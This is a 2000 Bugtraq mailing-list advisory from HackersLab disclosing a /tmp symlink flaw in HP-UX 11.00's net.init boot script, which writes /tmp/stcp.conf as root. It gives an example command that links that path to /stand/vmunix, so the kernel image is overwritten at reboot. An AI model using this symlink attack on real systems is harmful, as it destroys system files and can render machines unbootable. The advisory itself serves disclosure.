[16337] in bugtraq
[HackersLab bugpaper] HP-UX net.init rc script
daemon@ATHENA.MIT.EDU (Kyong-won Cho)
Tue Aug 22 00:04:41 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="ks_c_5601-1987"
Content-Transfer-Encoding: 7bit
Message-Id: <001401c00ba4$cc8ba5e0$071bebcb@gnfnr>
Date: Tue, 22 Aug 2000 04:19:59 +0900
Reply-To: Kyong-won Cho <dubhe@HACKERSLAB.COM>
From: Kyong-won Cho <dubhe@HACKERSLAB.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
============================================================================
====
[ Hackerslab bug_paper ] HP-UX net.init rc script
============================================================================
====
Testing : HP-UX 11.00
default HP-UX clean_tmps rc script is disable.
cat /etc/rc.config.d
...
CLEAR_TMP=0
...
But, When clean_tmps rc script enable, Anybody able to risk system
CLEAR_TMP=1
- rc script file priorty
/sbin/rc2.d/S008net.init
/sbin/rc2.d/S204clean_tmps
- /sbin/init.d/net.init
...omited....
cat > /tmp/stcp.conf <<EndConf
tcp -1 0 tcpm
udp -1 0 udpm
rawip -1 0 rawipm
arp -1 0 arpm
EndConf
...omited...
If you make symbolic link to /tmp/stcp.conf, It's overwrite destination in
root permission when reboot.
Ex ) ln -s /stand/vmunix /tmp/stcp.conf
==--------------------------------------------------------------------------
-----==
********
* ** ** *
* ** ** *
* ****** *
* ** ** *
dubhe@hackerslab.org
* ** ** *
http://www.hackerslab.org ]
******** HACKERSLAB (C) since 2000
==--------------------------------------------------------------------------
-----==
